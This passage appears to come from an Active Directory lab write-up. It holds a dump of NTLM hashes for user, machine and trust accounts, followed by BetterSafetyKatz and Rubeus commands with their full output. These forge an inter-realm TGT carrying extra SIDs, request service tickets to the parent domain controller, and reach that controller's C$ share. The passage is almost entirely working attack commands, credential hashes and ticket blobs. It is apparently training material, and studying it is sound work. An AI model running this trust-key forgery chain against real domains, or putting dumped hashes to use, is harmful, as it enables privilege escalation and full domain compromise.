RID : 00003558 (13656)

User : Support176user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003559 (13657)

User : Support177user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355a (13658)

User : Support178user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355b (13659)

User : Support179user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355c (13660)

User : Support180user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355d (13661)

User : VPN161user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000355e (13662)

User : VPN162user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000355f (13663)

User : VPN163user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003560 (13664)

User : VPN164user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003561 (13665)

User : VPN165user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003562 (13666)

User : VPN166user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003563 (13667)

User : VPN167user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003564 (13668)

User : VPN168user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003565 (13669)

User : VPN169user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003566 (13670)

User : VPN170user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003567 (13671)

User : VPN171user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003568 (13672)

User : VPN172user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003569 (13673)

User : VPN173user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000356a (13674)
User : VPN174user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356b (13675)

User : VPN175user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356c (13676)

User : VPN176user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356d (13677)

User : VPN177user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356e (13678)

User : VPN178user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356f (13679)

User : VPN179user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003570 (13680)

User : VPN180user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 000003e8 (1000)

User : DCORP-DC$
LM :
NTLM : 81a9ccc2f44b988af78448ad78297ad5

RID : 00000451 (1105)

User : DCORP-ADMINSRV$
LM :
NTLM : b5f451985fd34d58d5120816d31b5565

RID : 00000452 (1106)

User : DCORP-APPSRV$
LM :
NTLM : b4cb7bf8b93c78b8051c7906bb054dc5

RID : 00000453 (1107)

User : DCORP-CI$
LM :
NTLM : f76f48c176dc09cfd5765843c32809f3

RID : 00000454 (1108)

User : DCORP-MGMT$
LM :
NTLM : 0878da540f45b31b974f73312c18e754
RID : 00000455 (1109)
User : DCORP-MSSQL$
LM :
NTLM : b205f1ca05bedace801893d6aa5aca27

RID : 00000456 (1110)

User : DCORP-SQL1$
LM :
NTLM : 3686dfb420dc0f9635e70c6ca5875b49

RID : 0000106a (4202)

User : DCORP-STDADMIN$
LM :
NTLM : 323e49189b1edbea4a323142017328cb

RID : 00003571 (13681)

User : DCORP-STD161$
LM :
NTLM : 9ef9daa7b4bc99ab3e4121f2abd037c7

RID : 00003572 (13682)

User : DCORP-STD162$
LM :
NTLM : 354a9b4320a227e36d82c19f92851f5b

RID : 00003573 (13683)

User : DCORP-STD163$
LM :
NTLM : 75e1e5ec9a9f15290d40cd1b04fede35

RID : 00003574 (13684)

User : DCORP-STD164$
LM :
NTLM : 9fa111e9828fcb2a53d01dcf8133cc0d

RID : 00003575 (13685)

User : DCORP-STD165$
LM :
NTLM : 565d99510bbbe8fb3e4fa5c9c2120bc5

RID : 00003576 (13686)

User : DCORP-STD166$
LM :
NTLM : 1ab7d20a96b7b4b34e0c806b7631ad8e

RID : 00003577 (13687)

User : DCORP-STD168$
LM :
NTLM : 313fc2c203e17c1a63554c88e090c205

RID : 00003578 (13688)

User : DCORP-STD167$
LM :
NTLM : 69a450cb407f22862f946f22d20db2c2

RID : 00003579 (13689)

User : DCORP-STD169$
LM :
NTLM : ceeab9f5c7798eb9034512934ec115a8

RID : 0000357a (13690)

User : DCORP-STD170$
LM :
NTLM : 1d24dfc4057c69f71576c0cc1e862a17

RID : 0000357b (13691)

User : DCORP-STD171$
LM :
NTLM : 84d9394ef97f221290f257059e8086d0

RID : 0000357c (13692)

User : DCORP-STD172$
LM :
NTLM : 49cc46d9ea5e322232497c21f808ff88

RID : 0000357d (13693)

User : DCORP-STD173$
LM :
NTLM : 323a672db50f9467fde4368c6a60c8d8

RID : 0000357e (13694)

User : DCORP-STD174$
LM :
NTLM : b642781c290b8550a2e9b2661cf87654

RID : 0000357f (13695)

User : DCORP-STD175$
LM :
NTLM : 57f3d186ece9047624b82015fab8d00e

RID : 00003580 (13696)

User : DCORP-STD176$
LM :
NTLM : 79207f3a25b685aa97ea1b34aef53fef

RID : 00003581 (13697)

User : DCORP-STD177$
LM :
NTLM : 2979ebc70dd459e65f8ac3e998aed6b1

RID : 00003582 (13698)

User : DCORP-STD178$
LM :
NTLM : 956164515f0459ea114452437d5ea4d7

RID : 00003583 (13699)

User : DCORP-STD180$
LM :
NTLM : 459c493625fe5994ff309debff15f163

RID : 00003584 (13700)

User : DCORP-STD179$
LM :
NTLM : c9b2183c974b57b61d873026a4443688

RID : 0000044f (1103)

User : mcorp$
LM :
NTLM : a8f73b279dc7257c7a8a2d0c911043d2

RID : 00000450 (1104)

User : US$
LM :
NTLM : 3bc75c500d5b5ff9d6d246c80da6a2fc

RID : 00000458 (1112)

User : ecorp$
LM :
NTLM : 48535da9746fc33e5e04cca00c31a7e2

Forging inter-realm TGT

Using BetterSafetyKatz.exe
C:\Windows\system32>C:\AD\Tools\Old_tools\BetterSafetyKatz.exe "kerberos::golden
/user:administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-
3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519
/rc4:a8f73b279dc7257c7a8a2d0c911043d2 /service:krbtgt /target:moneycorp.local
/ticket:C:\Users\student163\Desktop\shared\trustticket.kirbi" "exit"
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /user:administrator /domain:dollarcorp.moneycorp.local

/sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519
/rc4:a8f73b279dc7257c7a8a2d0c911043d2 /service:krbtgt /target:moneycorp.local
/ticket:C:\Users\student163\Desktop\shared\trustticket.kirbi
User : administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-335606122-960912869-3279953914-519 ;
ServiceKey: a8f73b279dc7257c7a8a2d0c911043d2 - rc4_hmac_nt
Service : krbtgt
Target : moneycorp.local
Lifetime : 7/4/2024 10:17:52 AM ; 7/2/2034 10:17:52 AM ; 7/2/2034 10:17:52 AM
-> Ticket : C:\Users\student163\Desktop\shared\trustticket.kirbi

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

mimikatz(commandline) # exit
Bye!

Now with the help of this inter-realm TGT we can ask for a service ticket for any service on the root domain
Controller.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgs
/ticket:"C:\Users\student163\Desktop\shared\trustticket.kirbi" /service:cifs/mcorp-
dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/mcorp-dc.moneycorp.local'
[*] Using domain controller: mcorp-dc.moneycorp.local (172.16.1.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

doIF3DCCBdigAwIBBaEDAgEWooIEvzCCBLthggS3MIIEs6ADAgEFoREbD01PTkVZQ09SUC5MT0NBTKIr
MCmgAwIBAqEiMCAbBGNpZnMbGG1jb3JwLWRjLm1vbmV5Y29ycC5sb2NhbKOCBGowggRmoAMCARKhAwIB
DqKCBFgEggRUGNW2wawTbYFV+max/JlmS+DPllv/hdwsdS2akYivHVve6g1kLCMbwwXy3WynBstrQN1c
QX2boACL9Q0Zcp6voO5HsrEBdqqvhA01rgq8GKs6D8cxdZVKD2w/noDYU/Qy9zr7L+aVZECRX8PWUaI9
JSM8pJsGFJHxZOITHRBx/A1dwoP6XJF/5AavwPUSAp7LmVBPmOvBgN4CiXvgcotqiQhNBCcazZ9q4HCH
QvAKX2Ka3k0bHM8zmNuw3YyU2Wa8NXetSRzJeewYCON4xG41jc4Dn61/Vs0j7bKT58q1xIYhzgGj0Py5
Y4DapTWJAsb4m7xT2qE2i84LHXwpaWr+vFVt5psjR0ZUHon2XYvBOizL7Ibn3DFco54WIpmlPY4+K8sR
K7vXv1ftzhYDivUk2ssgNoonBdFCmfWi+sBZ5oI9nkVgAs1gDV1XadBx0aBWmC1QXEN1NTH48nnkqb1R
6PZmCgWMWhGxaSDUk0blqyPU9jv9DcE+Z+6slegYfLlqhXLvxN/42nudHy859sZxr4up+o0N/6iVzN2n
NdG/ALJ3gjlvuhkl03y5A7glEfYMQmg4YFuzpdUiLd1UPILn0cjxOfUJI8StCNG+0tHTwDci7G+I3b6Z
vVvXJsWKdcfO+5J7KWmYwBdBqgveI55HP3H/Td7lgjOCqMx/LA1LZ1YXDKmN/QmAEKLF+8N0hYCpCA0b
9VicAHAjp8/3176WAddYn6mGaLajG7/vtMoFT2qjgWfGufmnCQpGbmTb1Frw0HSuURPPCF3cnlYF5cP5
Wqmf8aDy9fe8fX2GETpBFnbVwFhx6XypGSNvl5XHMXtlpzIqNOOq8mOpAg6O5OivR4k76/VUFr2Y60GO
NcJBHPpj+xX8Uyx3LWmqPPRxT6XYqu1TyApoaMYYLGUPsAzGO35rk01gdb2QGxOqAAxHjprt1QppQjlY
i/PGAJ2J0V/CJkTcOv+lTuj7XwL1ZpMDMA56Ltyb4rznmMCueM0boE80n8KOkRVFJf7nQVZAJdV5xw4X
RJ8X1ONy5wW9vzKYPWnJimNCXBWeNEDxKYTqcwQQsAk12vHf3/ha7L1lezd1dncOfOeNAlZHCXWXswM/
GmTglFUg4UCcSUY93Eun+ZwMZtBNGoq7nDkIuVGiy6qhllNDI7M0DU//z217ItGmqzFzbHhSWBl9Uw6/
xsU1pGgXDCdnbIo5XALft2/HMV+e1uF+Z4q8OdSnyoTUI7M0ZVjxJVviazNJJX5xtV+GM7/+++oMDee9
UtWRj/qgcOSlXIppS6fI++VaSrSbsvH/V1v4k3nZ/cK6WIH93asj+LzuyUo6ErEnqCvGMvWisuWi/P4Q
t+eAQtqwSCXtvGwIXK5lAnrBOnRNLIq/61jH592BCcxJJSlzMwq6wLTFfi3JE9rTX9Q8mp9KZ1b8HONK
zZCzqSF+UbAU8LuAKQXn+nx1UJVcxCVIheXJcmUdiI4Nz5OXR6OCAQcwggEDoAMCAQCigfsEgfh9gfUw
gfKgge8wgewwgemgKzApoAMCARKhIgQgJ7r2661WSy09dx0wN/HwdhPIcqbZu9isQahO1U57RsehHBsa
ZG9sbGFyY29ycC5tb25leWNvcnAubG9jYWyiGjAYoAMCAQGhETAPGw1hZG1pbmlzdHJhdG9yowcDBQBA
pQAApREYDzIwMjQwNzA0MTcxOTM0WqYRGA8yMDI0MDcwNTAzMTkzNFqnERgPMjAyNDA3MTExNzE5MzRa
qBEbD01PTkVZQ09SUC5MT0NBTKkrMCmgAwIBAqEiMCAbBGNpZnMbGG1jb3JwLWRjLm1vbmV5Y29ycC5s
b2NhbA==

ServiceName : cifs/mcorp-dc.moneycorp.local
ServiceRealm : MONEYCORP.LOCAL
UserName : administrator
 UserRealm : dollarcorp.moneycorp.local
StartTime : 7/4/2024 10:19:34 AM
EndTime : 7/4/2024 8:19:34 PM
RenewTill : 7/11/2024 10:19:34 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable,
forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : J7r2661WSy09dx0wN/HwdhPIcqbZu9isQahO1U57Rsc=

C:\Windows\system32>klist

Current LogonId is 0:0x2125aa

Cached Tickets: (1)

#0> Client: administrator @ dollarcorp.moneycorp.local

Server: cifs/mcorp-dc.moneycorp.local @ MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate
name_canonicalize
Start Time: 7/4/2024 10:19:34 (local)
End Time: 7/4/2024 20:19:34 (local)
Renew Time: 7/11/2024 10:19:34 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

C:\Windows\system32>dir \\mcorp-dc.moneycorp.local\c$\
Volume in drive \\mcorp-dc.moneycorp.local\c$ has no label.
Volume Serial Number is 1A5A-FDE2

Directory of \\mcorp-dc.moneycorp.local\c$

05/08/2021 01:20 AM <DIR> PerfLogs

11/10/2022 10:53 PM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
11/11/2022 07:33 AM <DIR> Users
01/10/2024 02:35 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 11,244,785,664 bytes free

Using Rubeus
C:\Windows\system32>C:\AD\Tools\Rubeus.exe silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL
/rc4:a8f73b279dc7257c7a8a2d0c911043d2 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-
21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1
[*] Action: Build TGS

[*] Trying to query LDAP using LDAPS for user information on domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(samaccountname=Administrator)'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group
Policy Creator Owners,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain
Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Built
in,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-719815819-3726368948-3917688648-
513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[*] \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL successfully mounted
[*] Attempting to unmount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[*] \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL successfully unmounted
[*] Retrieving netbios name information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for
'(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Building PAC

[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (dcorp)

[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 544,512,520,513
[*] ExtraSIDs : S-1-5-21-335606122-960912869-3279953914-519
[*] ServiceKey : A8F73B279DC7257C7A8A2D0C911043D2
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey : A8F73B279DC7257C7A8A2D0C911043D2
[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5
[*] Service : krbtgt
[*] Target : DOLLARCORP.MONEYCORP.LOCAL

[*] Generating EncTicketPart

[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for '[email protected]'

[*] AuthTime : 7/4/2024 10:33:21 AM

[*] StartTime : 7/4/2024 10:33:21 AM
[*] EndTime : 7/4/2024 8:33:21 PM
[*] RenewTill : 7/11/2024 10:33:21 AM

[*] base64(ticket.kirbi):

doIGPjCCBjqgAwIBBaEDAgEWooIFCjCCBQZhggUCMIIE/qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wL
aADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBKYwggSioAMCARehAwIBA6KCBJQEggSQsT
mYQYF3V25z3NMU3E+6o9jfABYQ8cEmNW3js6KS4EXzULpR5xlokVpHbCxwBapPL6qqLRgLnOmLjuo7wXnv2a8kBEvYzbZ5nLF
gXUK8crz9fBV557iK5pM2/rH70WU5ywoSKZ4T8s1PFKH+9+yN2IpVXeQQ6tARrvPfnnalrQOEhpGetwP6qKnP6w5poiSNeaDt
G2SWn/Zv65x92QLZYAV8gltaVErY19jQcLrXthDVBGhywbe2WoqqGrh3k+OFXd1MjVhh1Jnjs0tWNwPZRAayKHgnydchvm0jc
NeP2ComUeXwXMpFGS0/ftaQbpJX4X24CNKcipWPPlSmhnwSGydKiAII7AHB9DLfj2MBKCNNnkNRfgtOnS70hAoLlKADBpWnpV
sleuUppKmAATMaBYxyxOrEnH3G92mEeEUFer32Oz6+R7Leh6kSnneRlhP1VfOlh/pRpBzzAx+zb94uafWIEYzK192qUcofrng
VSf37yUwNejUNTUwVu03FLiO39A5C+JgR19MFMKqxnpnCk1pL5OGOHJWpF7WkXHklCqtDnk5PfwkqXS4SXlgTLGGEVveFyB7q
2aCOnlLvZDxwGCH1bYvLgly4QR8BNeaeXwjeD/u+8AS3D++FgRoZklOVIUsXietZv+010ItHRDyg3Gsn3m2ibN6/iAaQE18sC
v1DoagOM6/Tb5RaHZeyJNvZ9pHb4z3Y273P2WXVVfyuYEI4SPUvG+Vfo/KrC3XIR95+G5AOB1OPDDaLT+040yAFr3fOt1Jju5
r1fDQvIK4k0TIKTnV1cqJ5Bl/GTiyELlKpPGGe98h3Twfk1EKtA5v6PMVhyxpiBrbf7UWAarpRTOP3iJzGffpDnvKeXQedsvK
BfKNvNXpj2ZMSvtr/Q2u2clZgaFeI078XO6A2V4XKCzSPEsYbEFGYZm+NGGrnnMwcJCRNL8vDaCQ3AeMuVQf6qAJ7CxriVS9L
TaBkQ4E4ApXTBONitEkTRkVOoGSv7uabxbs+emq9Q78ouojLIuu0z2EhgUf6c0YPbzaLHaWorGnnpVyLQNJ6Um0uJP+k7JRuN
NxOaV6C4nIQljsk9goxIAi2sZzUYdBn3y5NzpINmF07kGw8Ohjt3uTxeCVNTY9famCXTlRqYEmiVOCdgVCZku3DK0Ea5AoJj+
J6r2niO4LmmIN90Mo3OvcnrAwQdIAHaSA+keR+bPaIyZ4QBeTesqyP0U7/sGdMlUkNl5KAyFXrV3p1r09Cc3hgGtMDncaVWf1
pbyn68hHMjp8sSDy/TGby7+5qnJFvxJNl2T1Ej+SVu3wvhjdj6jTS6ZTLaTODpPsgJtHPQZSBsW1rT1Ja9at6mzE3l2Nk1ZW+
kDzY7ZKL3p2wgqhER8QQGB4GMo5sGiUaMxx7FQ0pQICgZg78/GbbsELDWGGA1ska1KyyRkLzmGSFiPp0dPk0lNgG98t3Dus/0
RQpER4VbLUD/7ce1j10v4g6+UAQaSIqemT0tfnE8Mikge3EckVD3naxXACocIwHg60FL6Hk5jNVlfVSu5EFOlFli5JOl7yu5r
Fda6OCAR4wggEaoAMCAQCiggERBIIBDX2CAQkwggEFoIIBATCB/jCB+6AbMBmgAwIBF6ESBBCDcd1aAZC6JK9PtVuVO/XioRw
bGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKAAAKQRGA8yMDI0
MDcwNDE3MzMyMVqlERgPMjAyNDA3MDQxNzMzMjFaphEYDzIwMjQwNzA1MDMzMzIxWqcRGA8yMDI0MDcxMTE3MzMyMVqoHBsaR
E9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypLzAtoAMCAQKhJjAkGwZrcmJ0Z3QbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0
FM

We will use Rubeus and the base64 encoded ticket to get a service ticket.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgs
/ticket:doIGPjCCBjqgAwIBBaEDAgEWooIFCjCCBQZhggUCMIIE/qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ
0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBKYwggSioAMCARehAwIBA6KCBJ
QEggSQsTmYQYF3V25z3NMU3E+6o9jfABYQ8cEmNW3js6KS4EXzULpR5xlokVpHbCxwBapPL6qqLRgLnOmLjuo7wXnv2a8kBEv
YzbZ5nLFgXUK8crz9fBV557iK5pM2/rH70WU5ywoSKZ4T8s1PFKH+9+yN2IpVXeQQ6tARrvPfnnalrQOEhpGetwP6qKnP6w5p
oiSNeaDtG2SWn/Zv65x92QLZYAV8gltaVErY19jQcLrXthDVBGhywbe2WoqqGrh3k+OFXd1MjVhh1Jnjs0tWNwPZRAayKHgny
dchvm0jcNeP2ComUeXwXMpFGS0/ftaQbpJX4X24CNKcipWPPlSmhnwSGydKiAII7AHB9DLfj2MBKCNNnkNRfgtOnS70hAoLlK
ADBpWnpVsleuUppKmAATMaBYxyxOrEnH3G92mEeEUFer32Oz6+R7Leh6kSnneRlhP1VfOlh/pRpBzzAx+zb94uafWIEYzK192
qUcofrngVSf37yUwNejUNTUwVu03FLiO39A5C+JgR19MFMKqxnpnCk1pL5OGOHJWpF7WkXHklCqtDnk5PfwkqXS4SXlgTLGGE
VveFyB7q2aCOnlLvZDxwGCH1bYvLgly4QR8BNeaeXwjeD/u+8AS3D++FgRoZklOVIUsXietZv+010ItHRDyg3Gsn3m2ibN6/i
AaQE18sCv1DoagOM6/Tb5RaHZeyJNvZ9pHb4z3Y273P2WXVVfyuYEI4SPUvG+Vfo/KrC3XIR95+G5AOB1OPDDaLT+040yAFr3
fOt1Jju5r1fDQvIK4k0TIKTnV1cqJ5Bl/GTiyELlKpPGGe98h3Twfk1EKtA5v6PMVhyxpiBrbf7UWAarpRTOP3iJzGffpDnvK
eXQedsvKBfKNvNXpj2ZMSvtr/Q2u2clZgaFeI078XO6A2V4XKCzSPEsYbEFGYZm+NGGrnnMwcJCRNL8vDaCQ3AeMuVQf6qAJ7
CxriVS9LTaBkQ4E4ApXTBONitEkTRkVOoGSv7uabxbs+emq9Q78ouojLIuu0z2EhgUf6c0YPbzaLHaWorGnnpVyLQNJ6Um0uJ
P+k7JRuNNxOaV6C4nIQljsk9goxIAi2sZzUYdBn3y5NzpINmF07kGw8Ohjt3uTxeCVNTY9famCXTlRqYEmiVOCdgVCZku3DK0
Ea5AoJj+J6r2niO4LmmIN90Mo3OvcnrAwQdIAHaSA+keR+bPaIyZ4QBeTesqyP0U7/sGdMlUkNl5KAyFXrV3p1r09Cc3hgGtM
DncaVWf1pbyn68hHMjp8sSDy/TGby7+5qnJFvxJNl2T1Ej+SVu3wvhjdj6jTS6ZTLaTODpPsgJtHPQZSBsW1rT1Ja9at6mzE3
l2Nk1ZW+kDzY7ZKL3p2wgqhER8QQGB4GMo5sGiUaMxx7FQ0pQICgZg78/GbbsELDWGGA1ska1KyyRkLzmGSFiPp0dPk0lNgG9
8t3Dus/0RQpER4VbLUD/7ce1j10v4g6+UAQaSIqemT0tfnE8Mikge3EckVD3naxXACocIwHg60FL6Hk5jNVlfVSu5EFOlFli5
JOl7yu5rFda6OCAR4wggEaoAMCAQCiggERBIIBDX2CAQkwggEFoIIBATCB/jCB+6AbMBmgAwIBF6ESBBCDcd1aAZC6JK9PtVu
VO/XioRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKAAAKQR
GA8yMDI0MDcwNDE3MzMyMVqlERgPMjAyNDA3MDQxNzMzMjFaphEYDzIwMjQwNzA1MDMzMzIxWqcRGA8yMDI0MDcxMTE3MzMyM
VqoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypLzAtoAMCAQKhJjAkGwZrcmJ0Z3QbGkRPTExBUkNPUlAuTU9ORVlDT1
JQLkxPQ0FM /service:host/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'host/mcorp-dc.moneycorp.local'
[*] Using domain controller: mcorp-dc.moneycorp.local (172.16.1.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
 doIGNDCCBjCgAwIBBaEDAgEWooIFFzCCBRNhggUPMIIFC6ADAgEFoREbD01PTkVZQ09SUC5MT0NBTKIr
MCmgAwIBAqEiMCAbBGhvc3QbGG1jb3JwLWRjLm1vbmV5Y29ycC5sb2NhbKOCBMIwggS+oAMCARKhAwIB
DqKCBLAEggSs+1ixhngGL1ZeBYxHcuj226zbQRVmwP2EVJbiW8zuoVOPDiQLsLuH/WrPtem/H1SbRLy7
nJZ035P2qtVkL1sWmVyXUMFjgmUrVf0+dqOKCepRD4QWS2SE/T7tqZF73MNHcI51xQxlfbGiSRquETMz
bg/5b1Lslut4hcFqlyvKulSprl/CZ8P6sXP4lBj90F4rsiStAn9ODHeQU44HyhqTT6Po14gVjTR/+80P
lDXJfkyAx3+RLmQAUcWBLShBokwbj6nsCUGslYZgqKKDzWTCuJ+JxJWcrI6pDx4q2Gxvlm01gxTJSuJz
LBuELlDAAVdA5SefRexHgNMtEaP2/rvGE6GRPynba1SRVWLndRi5LT0+snmG7C527PZ+oBBqHWyYRBuq
tbShI5eCSJq/oC+3gEwDVvQ0syfBL2Iq7rkRwvFh3DZ3Z5iLQP3a9yVYrcqQ4/DdHJP8i66VN6L93QTM
NXOt8QMVGtCtcJEzAAw0REUqM177TLSsdSw2fLI7DtgxFU5zjAmsX4YFnxWu7+5VUBO8wm3eKVNPpkGw
DoOUUBAQsaYCfpKCaWNKzSM7O5V2ZpqL9ClCU/7VjpKCYZuZu8xayHa1d4bki0gGjWKUn4XZJeQYCbJU
iDbxOfCUuuN4/bstIm0BGtbyslnh3KhnmAK+vPAT2iRWT8YfyWeJqhOYFFqDcixyBsIr3e+RaV2GO+Oj
QLJ4vftQB74x+j1dVa7DgyvOoQqKjxEAsOUDnC8UMEbXQCUxHredpOZW3DTqoeV1+k5AGUUlf1uX6iLx
8fmQupT4X7iSs296wNRpvGq/eiIDpeAFaM9AHvEaGIc1JHECf696BNyxFqXAG6tuYukQYga6CEYtYthQ
cje0oWrNznI4A0mI5zYyUjE8XzPlE8e7zu2W59+ail2ctxRixW6bwg9cOsjRb97pslEqeBrv9ZuhylCA
UhQ+qX3/9jKStPp0ZdNtuG0+Ep5yzeY0YL6XGKTPuOraH2Lk3QaA3Vdu7O7CWwvDgnGxlvwSeDwgp4+Z
DJ98Uej/f6rkeDfVp34640Nz4YEGhJZB9536LeNfb4aBj7+4V6qMacgu81I+7BLE2dbKiLR0bh4p+F9+
hxC8iLpUGb7QPJJCwFLUGv46j9NK0SXz58SUTBXjXWWHG82cxeB644w4ARr1K1BZeNcV9Xsj/FnaFMnI
JbrUsZCrDt3Don3JUKyTEC7zUk0DGOl2hT6fWSKxDgHXl/QUgTuPuxjnzF0RJc3WcI8ccSncnwByIT/B
IOgCst+sD0e5MbyJE+S+O4YBdgyyC9WSvhj8iQtCxwbbyuH9HgVtH8LL+Rw4pPecWA7/wPlS+Bp5mn3O
09vZKGb6PzwrxzWpBNIken6cJUHekeE4W6XT6h/2Lyu0wS0ZLNURUbi0CWx2k1J00yWSJNNSrmLVArHT
